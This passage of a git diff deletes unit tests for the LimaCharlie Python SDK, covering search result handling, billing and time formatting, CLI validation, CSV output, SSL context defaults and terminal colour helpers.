-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid"
-        manager._getSearchUrl = Mock(return_value='https://search.test/v1')
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-
-        # Mock response with mixed order
-        poll_response = {
-            'completed': True,
-            'results': [
-                {'type': 'events', 'rows': [{'e': '1'}], 'nextToken': None},
-                {'type': 'facets', 'facets': [{'f': '1'}], 'nextToken': None},
-                {'type': 'timeline', 'timeseries': [{'t': '1'}], 'nextToken': None},
-                {'type': 'events', 'rows': [{'e': '2'}], 'nextToken': None}
-            ]
-        }
-        manager.pollSearchResults = Mock(return_value=poll_response)
-
-        # Execute search
-        results = list(manager.executeSearch("test", 123, 456))
-
-        # Verify order: timeline, facets, events, events
-        assert len(results) == 4
-        assert results[0]['type'] == 'timeline'
-        assert results[1]['type'] == 'facets'
-        assert results[2]['type'] == 'events'
-        assert results[3]['type'] == 'events'
-
-    def test_first_of_type_in_page_flag(self):
-        """
-        Test that _first_of_type_in_page is set correctly for section separators.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid"
-        manager._getSearchUrl = Mock(return_value='https://search.test/v1')
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-
-        # Mock response with multiple results of same type
-        # Note: Results will be sorted as timeline → facets → events
-        poll_response = {
-            'completed': True,
-            'results': [
-                {'type': 'events', 'rows': [{'e': '1'}], 'nextToken': None},
-                {'type': 'events', 'rows': [{'e': '2'}], 'nextToken': None},
-                {'type': 'facets', 'facets': [{'f': '1'}], 'nextToken': None}
-            ]
-        }
-        manager.pollSearchResults = Mock(return_value=poll_response)
-
-        # Execute search
-        results = list(manager.executeSearch("test", 123, 456))
-
-        # After sorting: facets first, then events
-        # First facets result should be marked as first
-        assert results[0]['type'] == 'facets'
-        assert results[0]['_first_of_type_in_page'] == True
-        # First events result should be marked as first
-        assert results[1]['type'] == 'events'
-        assert results[1]['_first_of_type_in_page'] == True
-        # Second events result should NOT be marked as first
-        assert results[2]['type'] == 'events'
-        assert results[2]['_first_of_type_in_page'] == False
-
-
-class TestSearchAPIUtilityFunctions:
-    """Test utility functions from SearchAPI module."""
-
-    def test_format_duration_seconds(self):
-        """
-        Test format_duration with seconds only.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import format_duration
-
-        assert format_duration(0) == "0s"
-        assert format_duration(1) == "1s"
-        assert format_duration(30) == "30s"
-        assert format_duration(59) == "59s"
-        assert format_duration(59.9) == "59s"
-
-    def test_format_duration_minutes(self):
-        """
-        Test format_duration with minutes and seconds.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import format_duration
-
-        assert format_duration(60) == "1m 0s"
-        assert format_duration(90) == "1m 30s"
-        assert format_duration(125) == "2m 5s"
-        assert format_duration(3599) == "59m 59s"
-
-    def test_format_duration_hours(self):
-        """
-        Test format_duration with hours and minutes.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import format_duration
-
-        assert format_duration(3600) == "1h 0m"
-        assert format_duration(3660) == "1h 1m"
-        assert format_duration(5400) == "1h 30m"
-        assert format_duration(7200) == "2h 0m"
-        assert format_duration(86399) == "23h 59m"
-
-    def test_format_time_range_seconds(self):
-        """
-        Test format_time_range with seconds.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import format_time_range
-
-        assert format_time_range(0) == "0s"
-        assert format_time_range(1) == "1s"
-        assert format_time_range(30) == "30s"
-        assert format_time_range(59) == "59s"
-
-    def test_format_time_range_minutes(self):
-        """
-        Test format_time_range with minutes.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import format_time_range
-
-        assert format_time_range(60) == "1m"
-        assert format_time_range(120) == "2m"
-        assert format_time_range(1800) == "30m"
-        assert format_time_range(3599) == "59m"
-
-    def test_format_time_range_hours(self):
-        """
-        Test format_time_range with hours.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import format_time_range
-
-        assert format_time_range(3600) == "1h"
-        assert format_time_range(7200) == "2h"
-        assert format_time_range(43200) == "12h"
-        assert format_time_range(86399) == "23h"
-
-    def test_format_time_range_days(self):
-        """
-        Test format_time_range with days.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import format_time_range
-
-        assert format_time_range(86400) == "1d"
-        assert format_time_range(172800) == "2d"
-        assert format_time_range(604800) == "7d"
-        assert format_time_range(2592000) == "30d"
-
-    def test_print_statistics_basic(self, capsys):
-        """
-        Test print_statistics with basic values.
-
-        Parameters:
-            capsys: pytest fixture for capturing output.
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import print_statistics
-
-        print_statistics(
-            total_time=12.5,
-            poll_count=10,
-            page_count=2,
-            event_row_count=100,
-            facet_count=0,
-            timeline_count=0,
-            include_facets=False,
-            include_timeline=False
-        )
-
-        captured = capsys.readouterr()
-        assert "Search completed!" in captured.err
-        assert "Statistics:" in captured.err
-        assert "Total execution time: 12.50 seconds" in captured.err
-        assert "Poll attempts: 10" in captured.err
-        assert "Pages: 2" in captured.err
-        assert "Event rows: 100" in captured.err
-        # Facets and timeline should not be mentioned when count is 0
-        assert "Facets:" not in captured.err
-        assert "Timeline entries:" not in captured.err
-
-    def test_print_statistics_with_facets_and_timeline(self, capsys):
-        """
-        Test print_statistics with facets and timeline.
-
-        Parameters:
-            capsys: pytest fixture for capturing output.
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import print_statistics
-
-        print_statistics(
-            total_time=25.0,
-            poll_count=20,
-            page_count=5,
-            event_row_count=500,
-            facet_count=10,
-            timeline_count=50,
-            include_facets=True,
-            include_timeline=True
-        )
-
-        captured = capsys.readouterr()
-        assert "Event rows: 500" in captured.err
-        assert "Facets: 10" in captured.err
-        assert "Timeline entries: 50" in captured.err
-
-    def test_print_statistics_with_zero_counts(self, capsys):
-        """
-        Test print_statistics with zero counts.
-
-        Parameters:
-            capsys: pytest fixture for capturing output.
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import print_statistics
-
-        print_statistics(
-            total_time=0.5,
-            poll_count=1,
-            page_count=0,
-            event_row_count=0,
-            facet_count=0,
-            timeline_count=0,
-            include_facets=True,
-            include_timeline=True
-        )
-
-        captured = capsys.readouterr()
-        assert "Event rows: 0" in captured.err
-        # Zero counts should not be displayed even if included
-        assert "Facets: 0" not in captured.err
-        assert "Timeline entries: 0" not in captured.err
-
-    def test_print_billing_stats_empty(self, capsys):
-        """
-        Test print_billing_stats with empty dict.
-
-        Parameters:
-            capsys: pytest fixture for capturing output.
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import print_billing_stats
-
-        print_billing_stats({})
-
-        captured = capsys.readouterr()
-        # Should not print anything for empty stats
-        assert captured.err == ""
-
-    def test_print_billing_stats_none(self, capsys):
-        """
-        Test print_billing_stats with None.
-
-        Parameters:
-            capsys: pytest fixture for capturing output.
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import print_billing_stats
-
-        print_billing_stats(None)
-
-        captured = capsys.readouterr()
-        # Should not print anything for None
-        assert captured.err == ""
-
-    def test_print_billing_stats_bytes_small(self, capsys):
-        """
-        Test print_billing_stats with small byte count.
-
-        Parameters:
-            capsys: pytest fixture for capturing output.
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import print_billing_stats
-
-        stats = {'bytesScanned': 1024}
-        print_billing_stats(stats)
-
-        captured = capsys.readouterr()
-        assert "Billing:" in captured.err
-        assert "Bytes scanned: 1024 bytes" in captured.err
-
-    def test_print_billing_stats_bytes_mb(self, capsys):
-        """
-        Test print_billing_stats with megabytes.
-
-        Parameters:
-            capsys: pytest fixture for capturing output.
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import print_billing_stats
-
-        stats = {'bytesScanned': 5242880}  # 5 MB
-        print_billing_stats(stats)
-
-        captured = capsys.readouterr()
-        assert "Bytes scanned: 5.00 MB" in captured.err
-
-    def test_print_billing_stats_bytes_gb(self, capsys):
-        """
-        Test print_billing_stats with gigabytes.
-
-        Parameters:
-            capsys: pytest fixture for capturing output.
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import print_billing_stats
-
-        stats = {'bytesScanned': 3221225472}  # 3 GB
-        print_billing_stats(stats)
-
-        captured = capsys.readouterr()
-        assert "Bytes scanned: 3.00 GB" in captured.err
-
-    def test_print_billing_stats_all_fields(self, capsys):
-        """
-        Test print_billing_stats with all fields.
-
-        Parameters:
-            capsys: pytest fixture for capturing output.
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import print_billing_stats
-
-        stats = {
-            'bytesScanned': 1048576,  # 1 MB
-            'eventsScanned': 10000,
-            'eventsMatched': 500,
-            'eventsProcessed': 500,
-            'estimatedPrice': {'value': 0.0025, 'currency': 'USD'}
-        }
-        print_billing_stats(stats)
-
-        captured = capsys.readouterr()
-        assert "Billing:" in captured.err
-        assert "Bytes scanned: 1.00 MB" in captured.err
-        assert "Events scanned: 10000" in captured.err
-        assert "Events matched: 500" in captured.err
-        assert "Events processed: 500" in captured.err
-        assert "Estimated price: 0.0025 USD" in captured.err
-
-    def test_print_billing_stats_price_as_float(self, capsys):
-        """
-        Test print_billing_stats with price as float.
-
-        Parameters:
-            capsys: pytest fixture for capturing output.
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import print_billing_stats
-
-        stats = {'estimatedPrice': 0.0050}
-        print_billing_stats(stats)
-
-        captured = capsys.readouterr()
-        assert "Estimated price: 0.0050 USD" in captured.err
-
-    def test_print_billing_stats_price_with_different_currency(self, capsys):
-        """
-        Test print_billing_stats with different currency.
-
-        Parameters:
-            capsys: pytest fixture for capturing output.
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import print_billing_stats
-
-        stats = {
-            'estimatedPrice': {'value': 1.50, 'currency': 'EUR'}
-        }
-        print_billing_stats(stats)
-
-        captured = capsys.readouterr()
-        assert "Estimated price: 1.5000 EUR" in captured.err
-
-
-class TestSearchAPICoverageScenarios:
-    """Test scenarios to improve code coverage for SearchAPI functionality."""
-
-    def test_search_state_cancel_search_success(self, capsys):
-        """
-        Test SearchState.cancel_search() successfully cancels a search.
-
-        Parameters:
-            capsys: pytest fixture for capturing output.
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import SearchState
-        from limacharlie import Manager
-
-        state = SearchState()
-        state.manager = Manager.__new__(Manager)
-        state.query_id = "test-query-id-123"
-        state.manager.cancelSearch = Mock()
-
-        # Cancel the search
-        state.cancel_search()
-
-        # Verify cancelSearch was called
-        state.manager.cancelSearch.assert_called_once_with("test-query-id-123")
-
-        # Verify output
-        captured = capsys.readouterr()
-        assert "Canceling search query..." in captured.err
-        assert "Search query canceled." in captured.err
-
-    def test_search_state_cancel_search_with_error(self, capsys):
-        """
-        Test SearchState.cancel_search() handles errors gracefully.
-
-        Parameters:
-            capsys: pytest fixture for capturing output.
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import SearchState
-        from limacharlie import Manager
-
-        state = SearchState()
-        state.manager = Manager.__new__(Manager)
-        state.query_id = "test-query-id-456"
-        state.manager.cancelSearch = Mock(side_effect=Exception("API error"))
-
-        # Cancel the search (should not raise)
-        state.cancel_search()
-
-        # Verify error message
-        captured = capsys.readouterr()
-        assert "Canceling search query..." in captured.err
-        assert "Error canceling search: API error" in captured.err
-
-    def test_search_state_cancel_search_no_query(self):
-        """
-        Test SearchState.cancel_search() does nothing when no query is set.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import SearchState
-        from limacharlie import Manager
-
-        state = SearchState()
-        state.manager = Manager.__new__(Manager)
-        state.query_id = None  # No query
-        state.manager.cancelSearch = Mock()
-
-        # Cancel should do nothing
-        state.cancel_search()
-
-        # Verify cancelSearch was not called
-        state.manager.cancelSearch.assert_not_called()
-
-    def test_execute_search_with_facets_results(self):
-        """
-        Test executeSearch with facets result type.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock initiateSearch
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-
-        # Mock pollSearchResults with facets results
-        manager.pollSearchResults = Mock(return_value={
-            'completed': True,
-            'results': [
-                {
-                    'type': 'facets',
-                    'facets': [
-                        {'field': 'event_type', 'value': 'NEW_PROCESS', 'count': 100},
-                        {'field': 'event_type', 'value': 'DNS_REQUEST', 'count': 50}
-                    ],
-                    'nextToken': None
-                }
-            ]
-        })
-
-        # Execute search
-        results = list(manager.executeSearch('test query', 1234567890, 1234567900))
-
-        # Verify we got facets results
-        assert len(results) == 1
-        assert results[0]['type'] == 'facets'
-        assert len(results[0]['facets']) == 2
-        assert results[0]['facets'][0]['field'] == 'event_type'
-
-    def test_execute_search_with_timeline_results(self):
-        """
-        Test executeSearch with timeline result type.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock initiateSearch
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-
-        # Mock pollSearchResults with timeline results
-        manager.pollSearchResults = Mock(return_value={
-            'completed': True,
-            'results': [
-                {
-                    'type': 'timeline',
-                    'timeseries': [
-                        {'timestamp': 1234567890, 'count': 10},
-                        {'timestamp': 1234567900, 'count': 15},
-                        {'timestamp': 1234567910, 'count': 8}
-                    ],
-                    'nextToken': None
-                }
-            ]
-        })
-
-        # Execute search
-        results = list(manager.executeSearch('test query', 1234567890, 1234567900))
-
-        # Verify we got timeline results
-        assert len(results) == 1
-        assert results[0]['type'] == 'timeline'
-        assert len(results[0]['timeseries']) == 3
-        assert results[0]['timeseries'][0]['timestamp'] == 1234567890
-
-    def test_execute_search_with_mixed_result_types(self):
-        """
-        Test executeSearch with mixed result types (timeline, facets, events).
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock initiateSearch
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-
-        # Mock pollSearchResults with mixed result types
-        manager.pollSearchResults = Mock(return_value={
-            'completed': True,
-            'results': [
-                {
-                    'type': 'timeline',
-                    'timeseries': [
-                        {'timestamp': 1234567890, 'count': 10}
-                    ],
-                    'nextToken': 'token1'
-                },
-                {
-                    'type': 'facets',
-                    'facets': [
-                        {'field': 'event_type', 'value': 'NEW_PROCESS', 'count': 100}
-                    ],
-                    'nextToken': 'token2'
-                },
-                {
-                    'type': 'events',
-                    'rows': [
-                        {'event_id': '1', 'event_type': 'NEW_PROCESS'}
-                    ],
-                    'nextToken': None
-                }
-            ]
-        })
-
-        # Execute search
-        results = list(manager.executeSearch('test query', 1234567890, 1234567900))
-
-        # Verify we got all three result types
-        assert len(results) == 3
-        assert results[0]['type'] == 'timeline'
-        assert results[1]['type'] == 'facets'
-        assert results[2]['type'] == 'events'
-
-    def test_execute_search_with_progress_callback(self):
-        """
-        Test executeSearch with progress callback.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock initiateSearch
-        manager.initiateSearch = Mock(return_value={'queryId': 'query-123'})
-
-        # Track progress callback calls
-        progress_calls = []
-        def progress_callback():
-            progress_calls.append(time.time())
-
-        # Create a custom mock that tracks calls and eventually completes
-        poll_call_count = [0]
-        def mock_poll_results(query_id, token=None, max_attempts=300, poll_interval=2, progress_callback=None):
-            poll_call_count[0] += 1
-            # Call progress_callback if provided
-            if progress_callback:
-                progress_callback()
-            # Return results after a few polls
-            return {
-                'completed': True,
-                'results': [
-                    {
-                        'type': 'events',
-                        'rows': [{'event_id': '1'}],
-                        'nextToken': None
-                    }
-                ]
-            }
-
-        manager.pollSearchResults = Mock(side_effect=mock_poll_results)
-
-        # Execute search with progress callback
-        results = list(manager.executeSearch(
-            'test query',
-            1234567890,
-            1234567900,
-            progress_callback=progress_callback,
-            poll_interval=0.1
-        ))
-
-        # Verify progress callback was called
-        assert len(progress_calls) >= 1  # At least 1 poll
-        assert len(results) == 1
-
-    def test_execute_search_with_on_query_initiated_callback(self):
-        """
-        Test executeSearch with on_query_initiated callback.
-
-        Parameters:
-            None
-
-        Return:
-            None
-        """
-        from limacharlie import Manager
-
-        manager = Manager.__new__(Manager)
-        manager._oid = "test-oid-123"
-        manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Track query ID from callback
-        initiated_query_id = [None]
-        def on_query_initiated(query_id):
-            initiated_query_id[0] = query_id
-
-        # Mock initiateSearch
-        manager.initiateSearch = Mock(return_value={'queryId': 'test-query-123'})
-
-        # Mock pollSearchResults
-        manager.pollSearchResults = Mock(return_value={
-            'completed': True,
-            'results': [
-                {
-                    'type': 'events',
-                    'rows': [{'event_id': '1'}],
-                    'nextToken': None
-                }
-            ]
-        })
-
-        # Execute search with callback
-        results = list(manager.executeSearch(
-            'test query',
-            1234567890,
-            1234567900,
-            on_query_initiated=on_query_initiated
-        ))
-
-        # Verify callback was called with query ID
-        assert initiated_query_id[0] == 'test-query-123'
-        assert len(results) == 1
-
-
-class TestSearchAPICLICoverage:
-    """Test CLI functionality for additional code coverage."""
-
-    def test_cli_validate_with_error(self, capsys):
-        """
-        Test CLI validate command with query error.
-
-        Parameters:
-            capsys: pytest fixture for capturing output.
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import main
-        from limacharlie import Manager
-        import sys
-
-        # Create a mock manager
-        mock_manager = Manager.__new__(Manager)
-        mock_manager._oid = "test-oid-123"
-        mock_manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock validation error response
-        mock_manager.validateSearch = Mock(return_value={
-            'query': 'invalid query',
-            'error': 'Syntax error at position 8',
-            'startTime': 1234567890,
-            'endTime': 1234567900
-        })
-
-        # Mock Manager() constructor
-        with patch('limacharlie.SearchAPI.Manager', return_value=mock_manager):
-            # Run CLI validate command and expect sys.exit(1)
-            try:
-                main([
-                    'validate',
-                    '-q', 'invalid query',
-                    '-s', '1234567890',
-                    '-e', '1234567900'
-                ])
-                assert False, "Should have exited with code 1"
-            except SystemExit as e:
-                assert e.code == 1
-
-        # Verify error message was printed
-        captured = capsys.readouterr()
-        assert "Validation failed" in captured.err
-        assert "Syntax error at position 8" in captured.err
-
-    def test_cli_validate_with_time_parse_error(self, capsys):
-        """
-        Test CLI validate command with time parsing error.
-
-        Parameters:
-            capsys: pytest fixture for capturing output.
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import main
-        from limacharlie import Manager
-
-        # Mock Manager() constructor
-        with patch('limacharlie.SearchAPI.Manager'):
-            # Run CLI validate command with invalid time
-            try:
-                main([
-                    'validate',
-                    '-q', 'test query',
-                    '-s', 'invalid-time-format',
-                    '-e', '1234567900'
-                ])
-                assert False, "Should have exited with code 1"
-            except SystemExit as e:
-                assert e.code == 1
-
-        # Verify error message was printed
-        captured = capsys.readouterr()
-        assert "Error parsing time" in captured.err
-
-    def test_cli_execute_with_time_parse_error(self, capsys):
-        """
-        Test CLI execute command with time parsing error.
-
-        Parameters:
-            capsys: pytest fixture for capturing output.
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import main
-        from limacharlie import Manager
-
-        # Mock Manager() constructor
-        with patch('limacharlie.SearchAPI.Manager'):
-            # Run CLI execute command with invalid time
-            try:
-                main([
-                    'execute',
-                    '-q', 'test query',
-                    '-s', '1234567890',
-                    '-e', 'invalid-time-format'
-                ])
-                assert False, "Should have exited with code 1"
-            except SystemExit as e:
-                assert e.code == 1
-
-        # Verify error message was printed
-        captured = capsys.readouterr()
-        assert "Error parsing time" in captured.err
-
-    def test_cli_execute_csv_output_to_file(self, tmp_path):
-        """
-        Test CLI execute command with CSV output to file.
-
-        Parameters:
-            tmp_path: pytest fixture for temporary directory.
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import main
-        from limacharlie import Manager
-        import csv
-
-        # Create a mock manager
-        mock_manager = Manager.__new__(Manager)
-        mock_manager._oid = "test-oid-123"
-        mock_manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock executeSearch to return events
-        mock_manager.executeSearch = Mock(return_value=iter([
-            {
-                'type': 'events',
-                'rows': [
-                    {'event_id': '1', 'event_type': 'NEW_PROCESS', 'nested': {'key': 'value'}},
-                    {'event_id': '2', 'event_type': 'DNS_REQUEST', 'list_field': ['a', 'b']}
-                ],
-                'nextToken': None,
-                '_page_number': 1,
-                '_first_of_type_in_page': True,
-                '_billing_stats': {}
-            }
-        ]))
-
-        # Create output file path
-        output_file = tmp_path / "output.csv"
-
-        # Mock Manager() constructor
-        with patch('limacharlie.SearchAPI.Manager', return_value=mock_manager):
-            # Run CLI execute command with CSV output
-            main([
-                'execute',
-                '-q', 'test query',
-                '-s', '1234567890',
-                '-e', '1234567900',
-                '--output-file', str(output_file),
-                '--output-format', 'csv',
-                '--non-interactive'
-            ])
-
-        # Verify CSV file was created
-        assert output_file.exists()
-
-        # Read and verify CSV content
-        with open(output_file, 'r') as f:
-            reader = csv.DictReader(f)
-            rows = list(reader)
-
-        assert len(rows) == 2
-        assert rows[0]['event_id'] == '1'
-        assert rows[0]['event_type'] == 'NEW_PROCESS'
-        assert rows[0]['nested/key'] == 'value'  # Flattened with / separator
-        assert rows[1]['event_id'] == '2'
-        assert rows[1]['list_field'] == '["a", "b"]'  # JSON-encoded list
-
-    def test_cli_execute_csv_auto_detect_from_extension(self, tmp_path):
-        """
-        Test CLI execute command with CSV format auto-detection from .csv extension.
-
-        Parameters:
-            tmp_path: pytest fixture for temporary directory.
-
-        Return:
-            None
-        """
-        from limacharlie.SearchAPI import main
-        from limacharlie import Manager
-        import csv
-
-        # Create a mock manager
-        mock_manager = Manager.__new__(Manager)
-        mock_manager._oid = "test-oid-123"
-        mock_manager._getSearchUrl = Mock(return_value='https://search.limacharlie.io/v1')
-
-        # Mock executeSearch to return events
-        mock_manager.executeSearch = Mock(return_value=iter([
-            {
-                'type': 'events',
-                'rows': [{'event_id': '1'}],
-                'nextToken': None,
-                '_page_number': 1,
-                '_first_of_type_in_page': True,
-                '_billing_stats': {}
-            }
-        ]))
-
-        # Create output file path with .csv extension
-        output_file = tmp_path / "results.csv"
-
-        # Mock Manager() constructor
-        with patch('limacharlie.SearchAPI.Manager', return_value=mock_manager):
-            # Run CLI execute command without --output-format (auto-detect from .csv)
-            main([
-                'execute',
-                '-q', 'test query',
-                '-s', '1234567890',
-                '-e', '1234567900',
-                '--output-file', str(output_file),
-                '--non-interactive'
-            ])
-
-        # Verify CSV file was created
-        assert output_file.exists()
-
-        # Read and verify it's valid CSV
-        with open(output_file, 'r') as f:
-            reader = csv.DictReader(f)
-            rows = list(reader)
-
-        assert len(rows) == 1
-        assert rows[0]['event_id'] == '1'
-
diff --git a/tests/unit/test_ssl_context.py b/tests/unit/test_ssl_context.py
deleted file mode 100644
index e7f3c700..00000000
--- a/tests/unit/test_ssl_context.py
+++ /dev/null
@@ -1,59 +0,0 @@
-import ssl
-import sys
-
-import pytest
-
-from limacharlie.Manager import _create_ssl_context
-
-
-class TestSSLContext:
-    """Tests for _create_ssl_context() to ensure secure defaults are maintained."""
-
-    @pytest.mark.skipif(sys.version_info < (3, 0), reason="Python 3+ only")
-    def test_ssl_context_returns_context(self):
-        """Verify that _create_ssl_context() returns an SSLContext object."""
-        ctx = _create_ssl_context()
-        assert ctx is not None
-        assert isinstance(ctx, ssl.SSLContext)
-
-    @pytest.mark.skipif(sys.version_info < (3, 0), reason="Python 3+ only")
-    def test_ssl_context_check_hostname_enabled(self):
-        """Verify that hostname checking is enabled for security."""
-        ctx = _create_ssl_context()
-        assert ctx.check_hostname is True, "check_hostname must be enabled for security"
-
-    @pytest.mark.skipif(sys.version_info < (3, 0), reason="Python 3+ only")
-    def test_ssl_context_cert_verification_required(self):
-        """Verify that certificate verification is required."""
-        ctx = _create_ssl_context()
-        assert ctx.verify_mode == ssl.CERT_REQUIRED, "verify_mode must be CERT_REQUIRED for security"
-
-    @pytest.mark.skipif(sys.version_info < (3, 10), reason="OP_IGNORE_UNEXPECTED_EOF requires Python 3.10+")
-    def test_ssl_context_has_ignore_unexpected_eof_flag(self):
-        """Verify that OP_IGNORE_UNEXPECTED_EOF flag is set on Python 3.10+."""
-        ctx = _create_ssl_context()
-        assert ctx.options & ssl.OP_IGNORE_UNEXPECTED_EOF, \
-            "OP_IGNORE_UNEXPECTED_EOF flag must be set for OpenSSL 3.0+ compatibility"
-
-    @pytest.mark.skipif(sys.version_info < (3, 0), reason="Python 3+ only")
-    def test_ssl_context_protocol_security(self):
-        """Verify that insecure protocols are not enabled."""
-        ctx = _create_ssl_context()
-        # OP_NO_SSLv2 and OP_NO_SSLv3 should be set by create_default_context()
-        # Note: In modern OpenSSL, OP_NO_SSLv2 may be 0 because SSLv2 is completely removed
-        if hasattr(ssl, 'OP_NO_SSLv2') and ssl.OP_NO_SSLv2 != 0:
-            assert ctx.options & ssl.OP_NO_SSLv2, "SSLv2 must be disabled"
-        if hasattr(ssl, 'OP_NO_SSLv3') and ssl.OP_NO_SSLv3 != 0:
-            assert ctx.options & ssl.OP_NO_SSLv3, "SSLv3 must be disabled"
-
-    @pytest.mark.skipif(sys.version_info < (3, 0), reason="Python 3+ only")
-    def test_ssl_context_matches_default_context_security(self):
-        """Verify that our context has at least the same security as default context."""
-        ctx = _create_ssl_context()
-        default_ctx = ssl.create_default_context()
-
-        # Our context should have the same or more security options as the default
-        assert ctx.check_hostname == default_ctx.check_hostname, \
-            "check_hostname should match default context"
-        assert ctx.verify_mode == default_ctx.verify_mode, \
-            "verify_mode should match default context"
diff --git a/tests/unit/test_term_utils.py b/tests/unit/test_term_utils.py
deleted file mode 100644
index 675fe3bc..00000000
--- a/tests/unit/test_term_utils.py
+++ /dev/null
@@ -1,105 +0,0 @@
-import os
-import sys
-import json
-import pytest
-
-from limacharlie.term_utils import useColors, prettyFormatDict
-
-# -------------------------------
-# Tests for the useColors function
-# -------------------------------
-
-def test_useColors_no_tty(monkeypatch):
-    """Test that useColors returns False when sys.stdout is not a tty."""
-    class DummyStdout:
-        def isatty(self):
-            return False
-
-    monkeypatch.setattr(sys, 'stdout', DummyStdout())
-    # Ensure NO_COLOR is not set and TERM is a regular terminal.
-    monkeypatch.delenv("NO_COLOR", raising=False)
-    monkeypatch.setenv("TERM", "xterm")
-    assert useColors() is False
-
-def test_useColors_no_color_env(monkeypatch):
-    """Test that useColors returns False when NO_COLOR is set, even if stdout is a tty."""
-    class DummyStdout:
-        def isatty(self):
-            return True
-
-    monkeypatch.setattr(sys, 'stdout', DummyStdout())
-    monkeypatch.setenv("NO_COLOR", "1")
-    monkeypatch.setenv("TERM", "xterm")
-    assert useColors() is False
-
-def test_useColors_term_dumb(monkeypatch):
-    """Test that useColors returns False when TERM is 'dumb'."""
-    class DummyStdout:
-        def isatty(self):
-            return True
-
-    monkeypatch.setattr(sys, 'stdout', DummyStdout())
-    monkeypatch.delenv("NO_COLOR", raising=False)
-    monkeypatch.setenv("TERM", "dumb")
-    assert useColors() is False
-
-def test_useColors_true(monkeypatch):
-    """Test that useColors returns True when conditions are met."""
-    class DummyStdout:
-        def isatty(self):
-            return True
-
-    monkeypatch.setattr(sys, 'stdout', DummyStdout())
-    monkeypatch.delenv("NO_COLOR", raising=False)
-    monkeypatch.setenv("TERM", "xterm")
-    assert useColors() is True
-
-# -------------------------------
-# Tests for the prettyFormatDict function
-# -------------------------------
-
-def test_prettyFormatDict_no_colors():
-    """
-    When use_colors is explicitly False, prettyFormatDict should return the JSON string
-    exactly as produced by json.dumps with sorted keys and proper indenting.
-    """
-    data = {"b": 1, "a": 2}
-    result = prettyFormatDict(data, use_colors=False, indent=2)
-    expected = json.dumps(data, indent=2, sort_keys=True)
-    assert result == expected
-
-def test_prettyFormatDict_with_colors():
-    """
-    When use_colors is True, prettyFormatDict should return a string that includes ANSI escape sequences.
-    We check for common ANSI escape codes (e.g., "\x1b[") in the result.
-    """
-    data = {"b": 1, "a": 2}
-    result = prettyFormatDict(data, use_colors=True, indent=2)
-    assert "\x1b[" in result
-
-def test_prettyFormatDict_default_use_colors(monkeypatch):
-    """
-    When use_colors is None, prettyFormatDict should fall back to useColors().
-    Here we simulate an environment that forces useColors() to return True.
-    """
-    class DummyStdout:
-        def isatty(self):
-            return True
-
-    monkeypatch.setattr(sys, 'stdout', DummyStdout())
-    monkeypatch.delenv("NO_COLOR", raising=False)
-    monkeypatch.setenv("TERM", "xterm")
-
-    data = {"b": 1, "a": 2}
-    result = prettyFormatDict(data, use_colors=None, indent=2)
-    # Since useColors() would be True in this controlled env, ANSI codes should be present.
-    assert "\x1b[" in result
-
-def test_prettyFormatDict_empty_dict():
-    """
-    Test prettyFormatDict with an empty dictionary.
-    """
-    data = {}
-    result = prettyFormatDict(data, use_colors=False, indent=2)
-    expected = json.dumps(data, indent=2, sort_keys=True)
-    assert result == expected
